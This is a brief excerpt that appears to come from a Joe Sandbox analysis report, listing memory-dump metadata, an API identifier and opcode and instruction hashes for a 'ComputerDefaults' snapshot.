                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: a483b05944b742940f9f9490b36a2d8fb8c72bd5cd336a5b7cc769229fee458d
                                                                    • Instruction ID: e1c759eb39fc555ea288ef2ec19c6a0e77c44fe32eda0c06e647b6a8bcf30d41
                                                                    • Opcode Fuzzy Hash: a483b05944b742940f9f9490b36a2d8fb8c72bd5cd336a5b7cc769229fee458d
                                                                    • Instruction Fuzzy Hash: 1711DA32E08B91C6DB05EF56E4440ADBBA4FB4AF95B598125DB4E43718EF38E492C740